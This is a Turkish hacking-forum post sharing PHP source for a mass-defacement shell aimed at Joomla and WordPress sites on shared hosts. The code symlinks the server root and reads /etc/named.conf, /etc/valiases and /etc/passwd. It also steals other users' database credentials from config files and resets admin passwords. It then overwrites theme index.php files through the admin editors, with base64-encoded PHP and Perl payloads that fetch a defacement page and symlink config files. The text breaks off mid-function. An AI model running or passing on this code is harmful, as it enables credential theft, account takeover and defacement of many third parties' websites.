Joomla ve WordPress Shelli
Not => Sadece Joomla ve WordPress Sitelere Shell yedirebileceğiniz bir Shell türüdür. Çoğu Shelleri Joomla ve WP yemiyor maalesef.

Kod:
KingSkrupellos Cyberizm.Org İslami Teşkilat Ordusu

<?php
error_reporting(0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
    $ar0=explode($marqueurDebutLien, $text);
    $ar1=explode($marqueurFinLien, $ar0[$i]);
    return trim($ar1[0]);
}

function randomt() {
    $chars = "abcdefghijkmnopqrstuvwxyz023456789";
    srand((double)microtime()*1000000);
    $i = 0;
    $pass = '';
    while ($i <= 7) {
        $num = rand() % 33;
        $tmp = substr($chars, $num, 1);
        $pass = $pass . $tmp;
        $i++;
    }
    return $pass;
}

function index_changer_wp($conf, $content) {
    $output = '';
    $dol = '$';
    $go = 0;
    $username = entre2v2($conf,"define('DB_USER', '","');");
    $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
    $dbname = entre2v2($conf,"define('DB_NAME', '","');");
    $prefix = entre2v2($conf,$dol."table_prefix  = '","'");
    $host = entre2v2($conf,"define('DB_HOST', '","');");

    $link=mysql_connect($host,$username,$password);
    if($link) {
        mysql_select_db($dbname,$link) ;
        $dol = '$';
        $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");
    } else {
        $output.= "[-] DB Error<br />";
    }
    if($req1) {

        $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
        $data = mysql_fetch_array($req);
        $site_url=$data["option_value"];

        $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='template'");
        $data = mysql_fetch_array($req);
        $template = $data["option_value"];

        $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='current_theme'");
        $data = mysql_fetch_array($req);
        $current_theme = $data["option_value"];

        $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
        $url2=$site_url."/wp-login.php";

        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url2);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
        curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
        curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
        $buffer = curl_exec($ch);

        $pos = strpos($buffer,"action=logout");
        if($pos === false) {
$output.= "[-] Login Error<br />";
        } else {
$output.= "[+] Login Successful<br />";
$go = 1;
        }
        if($go) {
$cond = 0;
$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer0 = curl_exec($ch);

$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');

if(substr_count($_file,"/index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
curl_close($ch);

$pos = strpos($buffer,'<div id="message" class="updated">');
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Updated Successfuly<br />";
$hk = explode('public_html',$_file);
$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
$cond = 1;
}
} else {
$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer0 = curl_exec($ch);

$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');

if(substr_count($_file,"index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
curl_close($ch);

$pos = strpos($buffer,'<div id="message" class="updated">');
if($pos === false) {
    $output.= "[-] Updating Index.php Error<br />";
} else {
    $output.= "[+] Index.php Template Updated Successfuly<br />";
    $output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
    $cond = 1;
}
} else {
$output.= "[-] index.php can not load in Theme Editor<br />";
}
}
        }
    } else {
        $output.= "[-] DB Error<br />";
    }
    global $base_path;
    unlink($base_path.'COOKIE.txt');
    return array('cond'=>$cond, 'output'=>$output);
}

function index_changer_joomla($conf, $content, $domain) {
    $doler = '$';
    $username = entre2v2($conf, $doler."user = '", "';");
    $password = entre2v2($conf, $doler."password = '", "';");
    $dbname = entre2v2($conf, $doler."db = '", "';");
    $prefix = entre2v2($conf, $doler."dbprefix = '", "';");
    $host = entre2v2($conf, $doler."host = '","';");
    $co=randomt();
    $site_url = "http://".$domain."/administrator";
    $output = '';
    $cond = 0;
    $link=mysql_connect($host, $username, $password);
    if($link) {
        mysql_select_db($dbname,$link) ;
        $req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");
        $req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
    } else {
        $output.= "[-] DB Error<br />";
    }
    
    if($req1){
        if ($req) {
$req = mysql_query("SELECT * from  `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
$data = mysql_fetch_array($req);
$template_name = $data["template"];

$req = mysql_query("SELECT * from  `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
$data = mysql_fetch_array($req);
$template_id = $data["extension_id"];

$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);

if($return && $hidden) {
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_REFERER, $url2);
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$pos = strpos($buffer,"com_config");
if($pos === false) {
$output.= "[-] Login Error<br />";
} else {
$output.= "[+] Login Successful<br />";
}
}
if($pos){
$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);

$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
if($hidden2) {
$output.= "[+] index.php file found in Theme Editor<br />";
} else {
$output.= "[-] index.php Not found in Theme Editor<br />";
}
}
if($hidden2) {
$url2=$site_url."/index.php?option=com_templates&layout=edit";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
curl_close($ch);

$pos = strpos($buffer,'<dd class="message message">');
$cond = 0;
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
  
} else {
$output.= "[+] Index.php Template successfully saved<br />";
$cond = 1;
}
}
        }
        else {
$req =mysql_query("SELECT * from  `".$prefix."templates_menu` WHERE client_id='0'");
$data = mysql_fetch_array($req);
$template_name=$data["template"];
$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);

if($hidden) {
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$pos = strpos($buffer,"com_config");
if($pos === false) {
$output.= "[-] Login Error<br />";
} else {
$output.= "[+] Login Successful<br />";
}
}

if($pos) {
$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
if($hidden2) {
$output.= "[+] index.php file founded in Theme Editor<br />";
} else {
$output.= "[-] index.php Not found in Theme Editor<br />";
}
}

if($hidden2) {
$url2=$site_url."/index.php?option=com_templates&layout=edit";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
curl_close($ch);

$pos = strpos($buffer,'<dd class="message message fade">');
$cond = 0;
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Template successfully saved<br />";
$cond = 1;
}
}
        }
    } else {
        $output.= "[-] DB Error<br />";
    }
    global $base_path;
    unlink($base_path.$co);
    return array('cond'=>$cond, 'output'=>$output);
}

function exec_mode_1($def_url, $hacker) {

    @mkdir('sym',0777);
    $wr  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
    $fp = @fopen ('sym/.htaccess','w');
    fwrite($fp, $wr);
    @symlink('/','sym/root');
    $dominios = @file_get_contents("/etc/named.conf");
    @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
    $out[1] = array_unique($out[1]);
    $numero_dominios = count($out[1]);
    echo "Total domains: $numero_dominios <br><br />";
    $def = file_get_contents($def_url);
    $def = urlencode($def);
    $dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5uZXQvZGVmYWNlZC8yMDEzLzAxLzEzL2JhbHRzdHVkaW8ubHQvaW5kZXguaHRtbCcpOw0KJHAgPSBleHBsb2RlKCdwdWJsaWNfaHRtbCcsZGlybmFtZShfX0ZJTEVfXykpOw0KJHAgPSAkcFswXS4ncHVibGljX2h0bWwnOw0KaWYgKCRoYW5kbGUgPSBvcGVuZGlyKCRwKSkgew0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG1sJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5waHAnLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgJGZwMSA9IEBmb3BlbigkcC4nL2luZGV4Lmh0bScsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICBlY2hvICdEb25lJzsNCn0NCmNsb3NlZGlyKCRoYW5kbGUpOw0KdW5saW5rKF9fRklMRV9fKTsNCj8+';
    $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
    $output = fopen('defaced.html', 'a+');
    $_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
    $_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
    echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
    $j = 1;
    $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
    for($i = $st; $i <= $numero_dominios; $i++)
    {
        $domain = $out[1][$i];
        $dono_arquivo = @fileowner("/etc/valiases/".$domain);
        $infos = @posix_getpwuid($dono_arquivo);
        
        if($infos['name']!='root') {
$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");

$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
        
if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count1'] = $_SESSION['count1'] + 1;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}

if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $dd);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config03 && preg_match('/DB_NAME/i',$config03)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config03, $dd);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {    
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
        }
    }
    echo '</table>';
    echo '<hr/>';
    echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';
    echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
    if($_SESSION['count1']+$_SESSION['count2'] > 0){
        echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}
function exec_mode_2($def_url) {
    
    $domains = @file_get_contents("/etc/named.conf");
    @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
    $out = array_unique($out[1]);
    $num = count($out);
    print("Total domains: $num<br><br />");
    
    $def = file_get_contents($def_url);
    $def = urlencode($def);
      
    $output = fopen('defaced.html', 'a+');
    $defaced = '';
    $count1 = 0;
    $count2 = 0;
    echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
    $j = 1;
    $map = array();
    foreach($out as $d) {
        $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
        $map[$info['name']] = $d;
    }
    $dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
           NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
           h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
           G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
           YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
           kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
           B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
    mkdir('plsym',0777);
    file_put_contents('plsym/plsym.cc', base64_decode($dt));
    chmod('plsym/plsym.cc', 0755);
    $wr  = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
    $fp = @fopen ('plsym/.htaccess','w');
    fwrite($fp, $wr);
    fclose($fp);
    $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');  
    
    $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
    unlink('plsym/plsym.cc');
    $data = file_get_contents($url);
    preg_match_all('/<a href="(.+)">/', $data, $match);
    unset($match[1][0]);
    $i = 1;
    foreach($match[1] as $m)    
    {
        $mz = explode('##',urldecode($m));
        $config01 = '';
        $config02 = '';
        if($mz[1] == 'joomla.txt') {
$config01 = file_get_contents($url.$m);
        }
        if($mz[1] == 'wordpress.txt') {
$config02 = file_get_contents($url.$m);
        }
        $domain = $map[$mz[0]];
        $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
        
        if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count1++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
        }

        if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $def);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count2++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
        }
    }
    echo '</table>';
    echo '<hr/>';
    echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
    echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
    if($count1+$count2 > 0){
        echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}

function exec_mode_3($def_url) {
    
    $domains = @file_get_contents("/etc/named.conf");
    @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
    $out = array_unique($out[1]);
    $num = count($out);
    print("Total domains: $num<br><br />");
    
    $def = file_get_contents($def_url);
    $def = urlencode($def);
      
    $output = fopen('defaced.html', 'a+');
    $defaced = '';
    $count1 = 0;
    $count2 = 0;
    echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
    $j = 1;
    $map = array();
    foreach($out as $d) {
        $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
        $map[$info['name']] = $d;
    }
    $dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
           kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
           VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
           3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
           cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
           MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
           R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
    mkdir('plsym',0777);
    file_put_contents('plsym/data.txt', $_POST['man_data']);
    file_put_contents('plsym/plsym.cc', base64_decode($dt));
    chmod('plsym/plsym.cc', 0755);
    $wr  = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
    $fp = @fopen ('plsym/.htaccess','w');
    fwrite($fp, $wr);
    fclose($fp);
    $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');  
    
    $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
    unlink('plsym/plsym.cc');
    $data = file_get_contents($url);
    preg_match_all('/<a href="(.+)">/', $data, $match);
    unset($match[1][0]);
    $i=1;
    foreach($match[1] as $m)    
    {
        $mz = explode('##',urldecode($m));
        $config01 = '';
        $config02 = '';
        if($mz[1] == 'joomla.txt') {
$config01 = file_get_contents($url.$m);
        }
        if($mz[1] == 'wordpress.txt') {
$config02 = file_get_contents($url.$m);
        }
        $domain = $map[$mz[0]];
        $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
        
        if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count1++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
        }

        if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $def);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count2++;
} else {
